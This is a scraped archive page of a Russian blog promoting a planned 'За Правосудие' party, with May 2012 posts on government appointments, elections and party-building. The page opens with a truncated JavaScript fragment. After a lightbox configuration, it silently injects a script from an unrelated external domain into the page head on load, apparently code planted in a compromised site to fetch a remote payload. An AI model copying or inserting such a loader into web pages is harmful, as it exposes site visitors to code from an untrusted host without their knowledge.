, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Архив за мая, 2012

Итоги недели

26 мая

В понедельник нам объявили, что Правительство России обновилось и омолодилось. Нам сказали, кем будет в ближайшие годы управляться страна и каждый может для себя решить, кто и на что способен.

Радует то, что главой МВД стал знающий свое дело и ответственный человек. Однако остался неизменным состав лиц, которые являются советниками и помощниками Президента России по правовым вопросам и деятельности судебной власти.

Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

События прошедшей недели

20 мая

Всем салют!

Предлагаю обсудить важнейшие события прошедшей недели, которые имеют отношение к  правосудию.

1. В СМИ сообщают о досрочном прекращении полномочий губернаторов, которые не пройдут  на выборах. Этой осенью должны пройти выборы в Белгородской, Новгородской, Амурской и Брянской областях. Если в августе мы сможем официально оформить создание партии «За Правосудие», то наши представители могли бы принять участие в них. При любом исходе мы получили бы первый опыт участия в выборах и заявили бы о себе в различных СМИ.
Читать полностью »

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Добро пожаловать

20 мая

Добро пожаловать на блог «За Правосудие!» — информационную площадку, посвящённую актуальным вопросам, связанным с деятельностью судебной власти в России.

История свидетельствует о том, что многократные попытки установить в России правосудие, как правило, заканчивались неудачно. Причиной тому является то, что деятельность государственных органов и должностных лиц, являлась неприкасаемой для судебной власти.

Читать полностью »

 

О проблемах, связанных с созданием партии «За Правосудие»

19 мая

Первые месяцы, связанные с созданием партии «За Правосудие» показали, что все поддерживают её создание лишь на словах. Только в четырех регионах (г. Москва, Московская, Челябинская и Свердловская областях)  нашлись энтузиасты, которые собрали группы из 15 человек, готовых поддержать создание партии «За Правосудие» и участвовать в работе партии. Они прислали списки этих людей.
Читать полностью »